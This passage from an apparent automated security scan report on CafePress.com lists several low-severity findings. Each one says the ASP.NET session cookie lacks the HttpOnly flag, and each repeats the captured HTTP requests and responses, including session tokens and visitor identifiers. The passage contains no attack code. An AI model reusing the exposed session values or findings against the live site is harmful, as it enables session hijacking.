GET /cp/info/help/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: http://help.cafepress.com/hc/s-74058960/cmd/kbresource/front_page!PAGETYPE?VisitorProfile=cafepress
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Content-Length: 216
Date: Sun, 26 Dec 2010 13:44:51 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://help.cafepress.com/hc/s-74058960/cmd/kbresource/front_page!PAGETYPE?VisitorProfile=cafepress">here</a>.</h2>...[SNIP]...
3.50. http://www.cafepress.com/cp/info/help/index.aspx
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/info/help/index.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/info/help/index.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: http://help.cafepress.com/hc/s-74058960/cmd/kbresource/front_page!PAGETYPE?VisitorProfile=cafepress
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Content-Length: 216
Date: Sun, 26 Dec 2010 13:44:51 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://help.cafepress.com/hc/s-74058960/cmd/kbresource/front_page!PAGETYPE?VisitorProfile=cafepress">here</a>.</h2>...[SNIP]...
3.51. http://www.cafepress.com/cp/info/sell/index.aspx
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/info/sell/index.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/info/sell/index.aspx?area=learn&page=learn HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 51638
Date: Sun, 26 Dec 2010 13:44:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 51638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
3.52. http://www.cafepress.com/cp/moredetails.aspx
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/moredetails.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/moredetails.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 400 Bad Request
Content-Type: text/html
Location: /cp/bing/errorpage.html?aspxerrorpath=/cp/moredetails.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Content-Length: 11
Date: Sun, 26 Dec 2010 13:44:56 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

Bad Request
3.53. http://www.cafepress.com/cp/products/
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/products/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/products/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 91664
Date: Sun, 26 Dec 2010 13:44:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 91664

<head> <title>Products at CafePress.com</title> </head> <body> <h1>Products at CafePress.com</h1> <div> <a href="?pg=0">Product range 0</a> <a href="?pg=1">Product range 1</...[SNIP]...
3.54. http://www.cafepress.com/cp/sitemap/
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/sitemap/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/sitemap/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 147577
Date: Sun, 26 Dec 2010 13:44:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 147577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
3.55. http://www.cafepress.com/cp/tags/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/cp/tags/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/tags/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 204157 Date: Sun, 26 Dec 2010 13:44:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 204157 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Tags at Cafepress</ti...[SNIP]...
3.56. http://www.cafepress.com/cp/viewcart.aspx
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/cp/viewcart.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
